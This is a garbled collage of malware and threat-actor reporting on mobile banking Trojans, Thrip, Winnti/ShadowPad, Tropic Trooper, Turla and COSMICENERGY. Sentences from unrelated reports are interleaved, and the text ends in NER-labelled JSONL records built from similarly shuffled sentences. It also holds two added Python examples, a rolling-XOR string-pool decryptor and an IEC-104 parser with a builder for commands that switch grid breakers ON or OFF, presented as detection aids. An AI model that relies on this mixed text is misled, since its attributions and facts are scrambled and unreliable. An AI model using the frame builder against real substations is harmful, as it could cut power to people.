It comes as no surprise then that many SMS-Trojans include bot functionality. Thrip was attempting to remotely install a previously unknown piece of malware (Infostealer.Catchamas) on computers within the victim's network. One might also note that the number of modules embedded in this variant is much higher (17) than the number of modules embedded in the variants previously documented in our white paper (8 to 10 modules). Ransomware attacks have shown no signs of slowing down in 2023.

According to our estimates, about 60% of mobile malware are elements of both large and small mobile botnets. Three computers in China were being used to launch the Thrip attacks. By default, every keystroke is recorded using the Keylogger module (306, previously documented by Avast) and saved to disk in the file %APPDATA%\PAGM\OEY\XWWEYG\WAOUE.
Mandiant Threat Intelligence assesses that UNC2452 activity aligns with nation-state priorities broadly and that the group's targeting patterns are consistent with Russian strategic interests.

By using Google Cloud Messaging, botnet owners can operate without a C&C server, thus eliminating the threat of the botnet being detected and blocked by law enforcement authorities. Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator. The log file is encrypted using the same algorithm as the one used to encrypt static strings from the module. Open Babel allows users to "search, convert, analyze, or store data from molecular modeling, chemistry, solid-state materials, biochemistry, or related areas," according to its website, and is used in other popular pieces of software in the science field.

Google Cloud Messaging is designed to send short messages (up to 4 KB) to mobile devices via Google services. Thrip seemed to be mainly interested in the operational side of the company. Using this module by default indicates that the attackers are interested in stealing information from the victims' machines.
Who is The Chaos Creator, and what else transpired between Harrison and Ashley Madison prior to his death?

The developer simply has to register and receive a unique ID for his applications. This suggests to us that Thrip's motives go beyond spying and may also include disruption. In contrast, the variants we described in our white paper didn't even have that module embedded. Now, there are some key differences to note in the newest versions of Foudre

The commands received via GCM cannot be blocked immediately on an infected device. Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip, we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations. As with previous ShadowPad variants, the Config module (102) contains an encrypted string pool that can be accessed from any other module. If an adversary can send an unauthorized command message to a control system, then it can instruct the control system device to perform an action outside the normal bounds of the device's actions.

We have detected several malicious programs using GCM for command and control – the widespread Trojan-SMS.AndroidOS.FakeInst.a, Trojan-SMS.AndroidOS.Agent.ao, and Trojan-SMS.AndroidOS.OpFake.a among others. The group had also targeted three different telecoms operators, all based in Southeast Asia.
The string pool is never stored entirely decrypted in memory; the field of interest is decrypted when needed and then immediately freed (thus quickly unavailable). Mandiant observed the threat actor use e.exe to load d.dll into lsass process memory.

Google is actively combating this use of the service, responding quickly to reports from antivirus companies and blocking the IDs of cybercriminals. In all cases, based on the nature of the computers infected by Thrip, it appeared that the telecoms companies themselves and not their customers were the targets of these attacks. The configuration size is 2180 bytes and the encrypted strings are located at offset 0x84. Threat actors like the Winnti group rarely ever stay static in terms of both tools and tactics.

Attacks on Windows XP allow mobile malware to infect a PC after connecting a smartphone or tablet. Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection. The algorithm used to decrypt the strings is the same as the one used to decrypt the static strings of the module.
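Two mechanisms described on this page are worth seeing in code: the hpqhvsei.dll payload decryption above (an XOR loop whose key is updated on every iteration) and the ShadowPad string pool that stays encrypted at rest and only decrypts the one field that is needed before releasing it. The Python below is an added illustration, not code from either report, and neither report gives the key schedule or the pool layout: the key-update rule (key = (key + 0x1F) & 0xFF), the [u16 length][bytes] pool layout and the sample strings are assumptions made for this example. One property it does show faithfully is that with a position-dependent key you can decrypt a field in the middle of the pool without touching the rest, because the key at offset n is fully determined by n.

```python
"""Rolling-XOR decryption and a decrypt-on-demand string pool.

Added example. The key update rule, pool layout and sample strings are
assumptions; the reports above do not specify them."""
import struct


def rolling_xor(data: bytes, key: int, step: int = 0x1F) -> bytes:
    """XOR every byte with a key that advances after each byte (assumed rule:
    key = (key + step) & 0xFF). XOR is an involution, so one routine does both
    encryption and decryption."""
    out = bytearray(len(data))
    for i, b in enumerate(data):
        out[i] = b ^ key
        key = (key + step) & 0xFF
    return bytes(out)


def build_pool(strings, key: int, step: int = 0x1F) -> bytes:
    """Constructed sample pool: [u16 little-endian length][utf-8 bytes]... then
    the whole pool is encrypted with the rolling XOR."""
    raw = b"".join(struct.pack("<H", len(s.encode())) + s.encode() for s in strings)
    return rolling_xor(raw, key, step)


class StringPool:
    """Keeps the pool encrypted; decrypts exactly one field per request and wipes
    the scratch buffer afterwards, mirroring the behaviour described for ShadowPad."""

    def __init__(self, blob: bytes, key: int, step: int = 0x1F):
        self.blob, self.key, self.step = blob, key, step
        self.scratch = bytearray()
        self.fields = []                     # (offset_of_data, length) per field
        off = 0
        while off + 2 <= len(blob):          # walk the headers without decrypting the data
            (n,) = struct.unpack("<H", self._decrypt(off, 2))
            self.fields.append((off + 2, n))
            off += 2 + n

    def _decrypt(self, off: int, n: int) -> bytes:
        # The key advances by `step` per byte, so at offset `off` it is key + step*off.
        key_at_off = (self.key + self.step * off) & 0xFF
        return rolling_xor(self.blob[off:off + n], key_at_off, self.step)

    def get(self, idx: int) -> str:
        off, n = self.fields[idx]
        self.scratch = bytearray(self._decrypt(off, n))
        value = self.scratch.decode()
        for i in range(len(self.scratch)):   # wipe before the buffer is released
            self.scratch[i] = 0
        return value


# Constructed sample data (paths from the report, key chosen arbitrarily).
KEY = 0x5A
STRINGS = [
    r"C:\ProgramData\DRM\CLR\CLR.exe",
    "clr_optimization_v4.0.30229_32",
    "wmplayer.exe",
]
POOL = build_pool(STRINGS, KEY)

if __name__ == "__main__":
    pool = StringPool(POOL, KEY)
    for i in range(len(pool.fields)):
        print(i, pool.get(i))
```

When reversing a real sample, the value of this layout is that a memory dump taken between requests holds only the ciphertext and a zeroed scratch buffer; the strings have to be recovered by re-implementing the decryption against the on-disk configuration, exactly as the analysis above does from offset 0x84.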
Who is the Winnti group?

In early 2013 we detected two identical applications on Google Play that were allegedly designed for cleaning the operating system of Android-based devices from unnecessary processes. Many of the tools they use now feature new behaviors, including a change in the way they maintain a foothold in the targeted network. The campaign ID is located at offset 0x99 and is the name of the targeted university.

In fact, the applications are designed to download the autorun.inf file, an icon file and the win32-Trojan file, which the mobile malicious program locates in the root directory of an SD card. Execute a command through exploits for CVE-2017-11882. Having a campaign ID related to the target is quite common in the case of ShadowPad and Winnti.
The image will still display in viewers but the downloader will extract the executable content using the appropriate decryption key and the decryption algorithm.

On connecting a smartphone in the USB drive emulation mode to a computer running Windows XP, the system automatically starts the Trojan (if AutoPlay on the external media is not disabled) and is infected. Execute a command through exploits for CVE-2018-0802. Interestingly, the timestamp present in this config at offset 0x84 is later than the modules' timestamps and the loader compilation timestamp. It crafts configurable IEC-104 Application Service Data Unit (ASDU) messages to change the state of RTU Information Object Addresses (IOAs) to ON or OFF.

The Trojan allows the criminals to remotely control the victim's computer and is capable of recording sound from a microphone. The backdoor will load the encrypted configuration file and decrypt it, then use Secure Sockets Layer (SSL) protocol to connect to command-and-control (C&C) servers. This suggests that this config is added manually to the sample after having been built.
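The LIGHTWORK description above (configurable IEC-104 ASDUs that flip an IOA to ON or OFF) and the earlier note that LIGHTWORK carries eight hardcoded IOAs point at the detection a network monitor on the OT segment should run: decode IEC 60870-5-104 I-format frames and alert on any single or double command activation aimed at an address that matters. The Python below is an added example, not code from Mandiant's COSMICENERGY write-up. The frames are constructed with the builder in the block, and the IOA watchlist is an assumption standing in for the real breaker and switch addresses of a given substation.

```python
"""Decode IEC 60870-5-104 I-format APDUs and flag control commands that would
switch a watched information object address (IOA) ON or OFF.

Added example; SAMPLE_FRAMES and WATCHED_IOAS are constructed for illustration."""
import struct

# ASDU type identifiers used here and the size of one information element each.
M_SP_NA_1, C_SC_NA_1, C_DC_NA_1, C_IC_NA_1 = 1, 45, 46, 100
ELEMENT_SIZE = {M_SP_NA_1: 1, C_SC_NA_1: 1, C_DC_NA_1: 1, C_IC_NA_1: 1}
COT_ACTIVATION = 6


def build_single_command(ioa, on, select=False, common_addr=1, tx=0, rx=0):
    """Constructed I-format APDU carrying one C_SC_NA_1 (single command).
    SCO byte: bit0 = requested state, bit7 = select (1) / execute (0)."""
    sco = (1 if on else 0) | (0x80 if select else 0)
    asdu = struct.pack("<BBBBH", C_SC_NA_1, 1, COT_ACTIVATION, 0, common_addr)
    asdu += struct.pack("<I", ioa)[:3] + bytes([sco])          # IOA is 3 bytes LE
    control = struct.pack("<HH", tx << 1, rx << 1)              # I-format: bit0 of tx = 0
    return bytes([0x68, len(control) + len(asdu)]) + control + asdu


def parse_apdu(frame):
    """Return a dict for an I-format frame; None for S/U frames or malformed input."""
    if len(frame) < 6 or frame[0] != 0x68 or frame[1] != len(frame) - 2:
        return None
    if frame[2] & 0x01:                       # S-format (..01) or U-format (..11)
        return None
    if len(frame) < 12:
        return None
    type_id, vsq, cause, originator, common_addr = struct.unpack("<BBBBH", frame[6:12])
    sq, count = vsq >> 7, vsq & 0x7F
    size = ELEMENT_SIZE.get(type_id)
    objects, pos = [], 12
    if size is not None:
        if sq:                                # SQ=1: one IOA, then `count` consecutive elements
            ioa = int.from_bytes(frame[pos:pos + 3], "little"); pos += 3
            for i in range(count):
                objects.append((ioa + i, frame[pos:pos + size])); pos += size
        else:                                 # SQ=0: every element carries its own IOA
            for _ in range(count):
                ioa = int.from_bytes(frame[pos:pos + 3], "little"); pos += 3
                objects.append((ioa, frame[pos:pos + size])); pos += size
    return {"type_id": type_id, "cot": cause & 0x3F, "negative": bool(cause & 0x40),
            "common_addr": common_addr, "objects": objects}


def flag_commands(frames, watched_ioas):
    """Detection logic: every activation of a single/double command aimed at a
    watched IOA is reported as (common_addr, ioa, requested_state, phase)."""
    findings = []
    for frame in frames:
        asdu = parse_apdu(frame)
        if not asdu or asdu["type_id"] not in (C_SC_NA_1, C_DC_NA_1):
            continue
        if asdu["cot"] != COT_ACTIVATION:
            continue
        for ioa, elem in asdu["objects"]:
            if ioa not in watched_ioas:
                continue
            if asdu["type_id"] == C_SC_NA_1:
                state = "ON" if elem[0] & 0x01 else "OFF"
            else:                             # DCO: DCS 1 = OFF, 2 = ON, 0/3 not permitted
                state = {1: "OFF", 2: "ON"}.get(elem[0] & 0x03, "INVALID")
            phase = "select" if elem[0] & 0x80 else "execute"
            findings.append((asdu["common_addr"], ioa, state, phase))
    return findings


# Constructed traffic: select-then-execute OFF on a watched breaker, plus a
# command to an address outside the watchlist that should not be reported.
WATCHED_IOAS = {2001, 2002, 2003}             # assumed breaker/switch addresses
SAMPLE_FRAMES = [
    build_single_command(2001, on=False, select=True),
    build_single_command(2001, on=False),
    build_single_command(4500, on=True),
]

if __name__ == "__main__":
    for common_addr, ioa, state, phase in flag_commands(SAMPLE_FRAMES, WATCHED_IOAS):
        print(f"station {common_addr}: IOA {ioa} -> {state} ({phase})")
```

Alerting on the select step as well as the execute step is deliberate: select/execute is the protocol's own two-phase safeguard, and a select arriving from a host that is not the engineering workstation is the earliest observable point of an unauthorized command.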
We would like to emphasize that this method of attack only works on Windows XP and Android versions prior to 2.2. TClient is actually one of Tropic Trooper's other backdoors. Even though it's probably coincidental, the date within the config corresponds to the date of the first detection of this sample at the corresponding university. CrowdStrike security researchers were working to develop proof-of-concept (POC) code for an exploit method indicative of the logging present after recent Play ransomware attacks.

The most advanced mobile malicious programs today are Trojans targeting users' bank accounts – the most attractive source of criminal earnings. The malicious loader will use dynamic-link library (DLL) hijacking (injecting malicious code into a process of a file/application) on sidebar.exe and launch dllhost.exe (a normal file). Once installed on the system, ShadowPad starts a hidden and suspended Microsoft Windows Media Player wmplayer.exe process and injects itself into that process.
Although we have not identified sufficient evidence to determine the origin or purpose of COSMICENERGY, we believe that the malware was possibly developed by either Rostelecom-Solar or an associated party to recreate real attack scenarios against energy grid assets.

Trend of the year: mobile banking Trojans

2013 was marked by a rapid rise in the number of Android banking Trojans. TClient, for instance, uses DLL hijacking and injection that may not be as noticeable to others. The path to wmplayer.exe is provided by the Config module. Additionally, Mandiant has observed the use of the SoftPerfect network scanner (netscan.exe) to perform internal network enumeration.

The cyber industry of mobile malware is becoming more focused on making profits more effectively, i.e., mobile phishing, theft of credit card information, money transfers from bank cards to mobile phones and from phones to the criminals' e-wallets. The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016, for instance. Once ShadowPad is injected into wmplayer.exe, the Online module will contact the C&C server using the URL specified in the configuration.
A risk-averse actor, Iran generally seeks to avoid direct military confrontation against conventionally superior foes.

Cybercriminals have become obsessed by this method of illegal earnings: at the beginning of the year we knew only 67 banking Trojans, but by the end of the year there were already 1321 unique samples. Taiwan has been a regular target of cyber espionage threat actors for a number of years. The communication is then handled by the TCP module (200), which was previously documented by Kaspersky. In June 2023, Anonymous Sudan claimed an operation targeting Microsoft services.

Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans. In early August, Unit 42 identified two attacks using similar techniques. In addition to ShadowPad, the Winnti malware was found on some machines at these two universities at the end of October (i.e. two weeks before ShadowPad) in the file C:\Windows\System32\oci.dll and is detected by ESET products as Win64/Winnti.CA.
Organizations evaluating their security posture and developing a risk-based security framework would be well served to consider the various potential motivation-related threats.

[Figure mobile_treats_2013_04s: The number of mobile banking Trojans in our collection]

Mobile banking Trojans can run together with Win-32 Trojans to bypass two-factor authentication – mTAN theft (the theft of banking verification codes that banks send their customers in SMS messages). which has been active since at least 2011. The Winnti malware usually contains a configuration specifying a campaign ID and a C&C URL. Monitor systems with access to OT resources for the creation of legitimate temporary folders, files, artifacts, and external libraries required as evidence of the execution of packaged Python scripts.

However, in 2013, autonomous mobile banking Trojans developed further. One of the attacks used Tropic Trooper's known Yahoyah malware, but the other attack deployed the widely available Poison Ivy RAT. On all machines the campaign ID matches the name of the targeted university and the C&C URLs are: If you are talking to someone who may be a target of commercial spyware (i.e. human rights journalists, activists, dissidents and lawyers)

Currently, such Trojans attack a limited number of bank customers, but it is expected that cybercriminals will invent new techniques that will allow them to expand the number and the geography of potential victims. This confirms the actors are using Poison Ivy as part of their toolkit, something speculated in the original Trend Micro report but not confirmed by them. w[redacted].livehost.live:443 and w[redacted].dnslookup.services:443, where the redacted part corresponds to the name of the targeted university. Therefore, there are cases where these vulnerabilities are accessible via the internet.

[Figure mobile_treats_2013_05s: Infections caused by mobile banking programs]

Today, the majority of banking Trojan attacks affect users in Russia and the CIS. The document attached to this e-mail exploits CVE-2012-0158. One can observe that the C&C URL used by both Winnti and ShadowPad complies with the scheme [backdoor_type][target_name].domain.tld:443, where [backdoor_type] is a single letter which is either "w" in the case of the Winnti malware or "b" in the case of ShadowPad.
The vulnerability , which could allow attackers to gain escalated privileges and unauthorized access to an environment , was first disclosed on May 31st in a security bulletin released by Progress .", "spans": [{"start": 182, "end": 197, "label": "Vulnerability"}, {"start": 198, "end": 211, "label": "Vulnerability"}, {"start": 239, "end": 242, "label": "System"}, {"start": 260, "end": 266, "label": "Malware"}, {"start": 271, "end": 280, "label": "Malware"}, {"start": 432, "end": 438, "label": "Malware"}, {"start": 471, "end": 480, "label": "Malware"}, {"start": 671, "end": 679, "label": "Organization"}]} {"text": "However , this situation will not last long : given the cybercriminals \u2019 interest in user bank accounts , the activity of mobile banking Trojans is expected to grow in other countries in 2014 . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate . From this format , we were able to find several C&C URLs , including three additional Hong Kong universities \u2019 names . A typical web request to the frontend to exploit the SSRF vulnerability on CVE-2022 - 41040 involves some variation of path confusion that references the endpoint as shown below : The backend request for a typical ProxyNotShell exploitation is shown below : Once the PowerShell remoting service can be reached , the second step involves vulnerability CVE-2022 - 41082 being exploited in order to execute arbitrary commands .", "spans": [{"start": 260, "end": 271, "label": "Malware"}, {"start": 397, "end": 400, "label": "Indicator"}, {"start": 521, "end": 539, "label": "Vulnerability"}, {"start": 543, "end": 559, "label": "Vulnerability"}]} {"text": "As mentioned above , banking Trojans are perhaps the most complex of all mobile threats , and Svpeng is one of the most striking examples . 
Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family , which has not been previously tied to the group . The campaign identifiers found in the samples we \u2019ve analyzed match the subdomain part of the C&C server , showing that these samples were really targeted against these universities . SocialPolitical Hacktivism primarily intrinsic Social or Ideological issues create a motivation for some to attack organizations to make a statement .", "spans": [{"start": 94, "end": 100, "label": "Malware"}, {"start": 229, "end": 251, "label": "System"}, {"start": 398, "end": 401, "label": "System"}, {"start": 603, "end": 616, "label": "Organization"}]} {"text": "Svpeng In mid-July , we detected Trojan-SMS.AndroidOS.Svpeng.a which , unlike its SMS Trojan counterparts , is focused on stealing money from the victiim \u2019 s bank account rather than from his mobile phone . This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan . The Winnti Group is still actively using one of its flagship backdoors , ShadowPad , this time against Hong Kong universities . 
None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 33, "end": 62, "label": "Malware"}, {"start": 282, "end": 296, "label": "Organization"}, {"start": 314, "end": 337, "label": "Organization"}, {"start": 351, "end": 366, "label": "Organization"}, {"start": 383, "end": 395, "label": "Organization"}, {"start": 440, "end": 449, "label": "Malware"}, {"start": 452, "end": 461, "label": "Malware"}, {"start": 545, "end": 565, "label": "Organization"}, {"start": 594, "end": 620, "label": "Organization"}, {"start": 671, "end": 689, "label": "System"}]} {"text": "It can not act independently and operates strictly in accordance with commands received from the C & C server . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors . In this campaign , the VMProtected launcher used with ShadowPad , as well as with the PortReuse backdoor and skip-2.0 , was replaced by a simpler one . These types of approaches are not uncommon historically , groups have done things like provide \" security reports \" to compromised organizations to help them \" resolve the issue . \"", "spans": [{"start": 112, "end": 126, "label": "Organization"}, {"start": 152, "end": 165, "label": "Vulnerability"}, {"start": 219, "end": 230, "label": "System"}, {"start": 250, "end": 259, "label": "Malware"}, {"start": 282, "end": 300, "label": "Malware"}, {"start": 305, "end": 313, "label": "Malware"}, {"start": 467, "end": 527, "label": "Malware"}]} {"text": "This malicious program spreads via SMS spam and from compromised legitimate sites that redirect mobile users to a malicious resource . The Tropic Trooper threat actor group has been known to target governments and organizations in the Asia Pacific region for at least six years . 
That these samples , in addition to having been found at these universities , contain campaign IDs matching the universities \u2019 names and use C&C URLs containing the universities \u2019 names are good indications that this campaign is highly targeted . 8.8 Management of technical vulnerabilities \u2013 prioritizing the mitigation and patching of vulnerabilities based on their potential and current risk of abuse requires identifying the assessed severity of a vulnerability and how this may change .", "spans": [{"start": 139, "end": 172, "label": "Organization"}, {"start": 198, "end": 209, "label": "Organization"}, {"start": 421, "end": 424, "label": "System"}]} {"text": "There the user is prompted to download and install a Trojan imitating an Adobe Flash Player update . Turla is a notorious group that has been targeting governments . We will continue to monitor new activities of the Winnti Group and will publish relevant information on our blog . Revenge intrinsic Disgruntled employees or former employees are those that typically commit the lions share of revengebased cyberattacks .", "spans": [{"start": 73, "end": 91, "label": "System"}, {"start": 101, "end": 106, "label": "Organization"}, {"start": 152, "end": 163, "label": "Organization"}, {"start": 216, "end": 228, "label": "Organization"}]} {"text": "Svpeng is capable of doing lots of things . Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets . For any inquiries , contact us at threatintel@eset.com . 
An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 44, "end": 49, "label": "Organization"}]} {"text": "It collects information about the smartphone ( IMEI , country , service provider , operating system language ) and sends it to the host via the HTTP POST request . Turla is a notorious group that has been targeting government officials . The IoCs are also available in our GitHub repository . Other big stories in June include a suspected LockBit affiliate arrest , the Royal ransomware gang toying with a new encryptor , and a notable increase in attacks on the Manufacturing sector .", "spans": [{"start": 164, "end": 169, "label": "Organization"}, {"start": 215, "end": 235, "label": "Organization"}, {"start": 273, "end": 279, "label": "System"}, {"start": 339, "end": 346, "label": "Organization"}, {"start": 370, "end": 391, "label": "Organization"}, {"start": 406, "end": 419, "label": "System"}, {"start": 463, "end": 483, "label": "Organization"}]} {"text": "This appears to be necessary to determine the number of banks the victim may use . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . ESET detection names : Win32 / Shadowpad.C trojan Win64 / Winnti.CA trojan . 
When CrowdStrike researchers later reproduced the attack , events were present in CozyDuke - also known as CozyBear , CozyCar and Office Monkeys ( among others ) , and whose activity appears to align with advanced persistent threat APT29 - is a threat actor which came to prominence in 2014 when it is believed to have staged a series of precise attacks on high profile targets including the US White House , Department of State and the Democratic National Committee .", "spans": [{"start": 87, "end": 96, "label": "Malware"}, {"start": 180, "end": 193, "label": "Vulnerability"}, {"start": 249, "end": 279, "label": "Vulnerability"}, {"start": 324, "end": 328, "label": "Organization"}, {"start": 347, "end": 352, "label": "System"}, {"start": 355, "end": 366, "label": "Indicator"}, {"start": 367, "end": 373, "label": "Malware"}, {"start": 374, "end": 379, "label": "System"}, {"start": 382, "end": 391, "label": "Indicator"}, {"start": 392, "end": 398, "label": "Malware"}, {"start": 406, "end": 429, "label": "Organization"}, {"start": 483, "end": 491, "label": "Malware"}, {"start": 508, "end": 516, "label": "Malware"}, {"start": 519, "end": 526, "label": "Malware"}, {"start": 531, "end": 545, "label": "Malware"}, {"start": 633, "end": 638, "label": "Organization"}, {"start": 793, "end": 807, "label": "Organization"}, {"start": 810, "end": 829, "label": "Organization"}, {"start": 838, "end": 867, "label": "Organization"}]} {"text": "Svpeng is only currently attacking clients of Russian banks . Turla is a notorious group that has been targeting diplomats . Winnti : hpqhvsei.dll . 
The messages show that Harrison was hired in March 2010 to help promote Ashley Madison online , but the messages also reveal Harrison was heavily involved in helping to create and cultivate phony female accounts on the service .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 62, "end": 67, "label": "Organization"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 125, "end": 131, "label": "Organization"}, {"start": 134, "end": 146, "label": "Indicator"}, {"start": 172, "end": 180, "label": "Organization"}, {"start": 221, "end": 235, "label": "Organization"}, {"start": 274, "end": 282, "label": "Organization"}]} {"text": "Typically , however , cybercriminals first test-run a technology on the Russian sector of the Internet and then roll it out globally , attacking users in other countries . The codename for Turla APT group in this presentation is MAKERSMARK . Winnti : CLR.exe . We searched for the unique string and identified a single match to a cyber range ( aka polygon ) developed by Rostelecom - Solar , a Russian cyber security company that received a government in 2019 to begin training cyber security experts and conducting electric power disruption and emergency response exercises .", "spans": [{"start": 189, "end": 204, "label": "Organization"}, {"start": 242, "end": 248, "label": "Organization"}, {"start": 251, "end": 258, "label": "Indicator"}, {"start": 330, "end": 341, "label": "Organization"}, {"start": 371, "end": 389, "label": "Organization"}, {"start": 394, "end": 424, "label": "Organization"}]} {"text": "It steals SMS messages and information about voice calls . The Intercept reported that there exists a 2011 presentation by Canada 's Communication Security Establishment ( CSE ) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced . Winnti : hpqhvsei.dll . 
Identifying suspicious virtual desktop agent Windows Registry keys", "spans": [{"start": 123, "end": 169, "label": "Organization"}, {"start": 172, "end": 175, "label": "Organization"}, {"start": 211, "end": 226, "label": "Organization"}, {"start": 303, "end": 309, "label": "Organization"}, {"start": 312, "end": 324, "label": "Indicator"}]} {"text": "It helps the attacker find out which banks the owner of the smartphone calls \u2013 the Trojan receives a list of bank phone numbers from its C & C server . The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case . Winnti : hpqhvind.exe . The configuration contains two C2 servers that are prefixed with a protocol identifier .", "spans": [{"start": 250, "end": 268, "label": "Organization"}, {"start": 304, "end": 311, "label": "System"}, {"start": 455, "end": 461, "label": "Organization"}, {"start": 464, "end": 476, "label": "Indicator"}, {"start": 510, "end": 520, "label": "System"}]} {"text": "It steals money from the victim \u2019 s bank account . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target . Winnti : hpqhvsei.dll . 
Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker \u2019s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": [{"start": 163, "end": 169, "label": "Organization"}, {"start": 172, "end": 184, "label": "Indicator"}, {"start": 206, "end": 223, "label": "Organization"}, {"start": 235, "end": 246, "label": "Organization"}, {"start": 247, "end": 333, "label": "Vulnerability"}]} {"text": "In Russia , some major banks offer their clients a special service that allows them to transfer money from their bank card to their mobile phone account . Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar . Winnti : oci.dll . ThreatConnect collects realtime intelligence from the CISA Known Exploited Vulnerabilities Catalog and Google Project Zero , as well as other feeds and sources , enriching it with insights from sources such as the National Vulnerability Database NVD and the global ThreatConnect community .", "spans": [{"start": 201, "end": 206, "label": "System"}, {"start": 230, "end": 239, "label": "System"}, {"start": 252, "end": 257, "label": "Organization"}, {"start": 272, "end": 278, "label": "Organization"}, {"start": 283, "end": 289, "label": "Organization"}, {"start": 292, "end": 298, "label": "Organization"}, {"start": 301, "end": 308, "label": "Indicator"}, {"start": 311, "end": 324, "label": "Organization"}, {"start": 365, "end": 409, "label": "Organization"}, {"start": 414, "end": 433, "label": "Organization"}, {"start": 525, "end": 564, "label": "Organization"}, {"start": 576, "end": 599, "label": "Organization"}]} {"text": "Customers have to send a set text message from their phone to a specific bank number . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated . 
Winnti : C&C : b[org_name].dnslookup.services : 443 . Organizations can collect this intelligence , review the threats described , consider if and how the threat is relevant to them , and the necessity of making any potential additional mitigations .", "spans": [{"start": 87, "end": 94, "label": "System"}, {"start": 162, "end": 167, "label": "System"}, {"start": 200, "end": 206, "label": "Organization"}, {"start": 209, "end": 212, "label": "System"}, {"start": 215, "end": 245, "label": "Indicator"}, {"start": 254, "end": 267, "label": "Organization"}]} {"text": "Svpeng sends the corresponding messages to the SMS services of two banks . Turla APT group makes an extra effort to avoid detection by wiping files securely , changing the strings and randomizing what could be simple markers through the different backdoor versions . Winnti : C&C : w[org_name].livehost.live : 443 . The ISO file contained at least the following :", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 75, "end": 90, "label": "Organization"}, {"start": 267, "end": 273, "label": "Organization"}, {"start": 276, "end": 279, "label": "System"}, {"start": 282, "end": 307, "label": "Indicator"}, {"start": 320, "end": 328, "label": "System"}]} {"text": "Svpeng does this to check if the cards from these banks are attached to the number of the infected phone and to find out the account balance . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions . Winnti : C&C : w[org_name].dnslookup.services : 443 . 
Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 164, "end": 174, "label": "System"}, {"start": 253, "end": 276, "label": "Organization"}, {"start": 279, "end": 285, "label": "Organization"}, {"start": 288, "end": 291, "label": "System"}, {"start": 294, "end": 324, "label": "Indicator"}, {"start": 394, "end": 611, "label": "Malware"}]} {"text": "If the phone is attached to a bank card , commands are sent from the C & C server with instructions to transfer money from the user \u2019 s bank account to his/her mobile account . Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file . Middle Eastern hacking group is using FinFisher malware to conduct international espionage . Looking at the motivations of hackers and cybercriminals is just one possible way to look at how we can dictate our cybersecurity priorities .", "spans": [{"start": 177, "end": 182, "label": "Organization"}, {"start": 195, "end": 214, "label": "System"}, {"start": 350, "end": 359, "label": "Malware"}, {"start": 435, "end": 442, "label": "Organization"}, {"start": 447, "end": 461, "label": "Organization"}]} {"text": "The cybercriminals then send this money to a digital wallet or to a premium number and cash it in . Over the last 10 months , Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call \" Epic Turla \" . Recently , there was a blog post on the takedown of a botnet used by threat actor group known as Group 72 and their involvement in Operation SMN . 
In November 2016 , Volexity documented new Dukes - related activity involving spear phishing with links to a ZIP archive containing a malicious LNK file , which would run PowerShell commands to install a new custom backdoor called PowerDuke .", "spans": [{"start": 126, "end": 139, "label": "Organization"}, {"start": 218, "end": 228, "label": "System"}, {"start": 287, "end": 293, "label": "Malware"}, {"start": 330, "end": 338, "label": "Organization"}, {"start": 399, "end": 407, "label": "Organization"}, {"start": 423, "end": 428, "label": "Malware"}, {"start": 611, "end": 620, "label": "Malware"}]} {"text": "It steals logins and passwords to online banking accounts by substituting he window displayed by the bank application . We also observed exploits against older ( patched ) vulnerabilities , social engineering techniques and watering hole strategies in these attacks . This group is sophisticated , well funded , and exclusively targets high profile organizations with high value intellectual property in the manufacturing , industrial , aerospace , defense , and media sector . None PIEHOP is a disruption tool written in Python and packaged with PyInstaller that is capable of connecting to a user - supplied remote MSSQL server for uploading files and issuing remote commands to a RTU .", "spans": [{"start": 190, "end": 208, "label": "Organization"}, {"start": 483, "end": 489, "label": "System"}, {"start": 495, "end": 510, "label": "System"}, {"start": 522, "end": 528, "label": "System"}, {"start": 547, "end": 558, "label": "System"}, {"start": 617, "end": 629, "label": "System"}, {"start": 683, "end": 686, "label": "System"}]} {"text": "Currently , this only affects Russian banks , but the technology behind Svpeng could easily be used to target other banking applications . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies . 
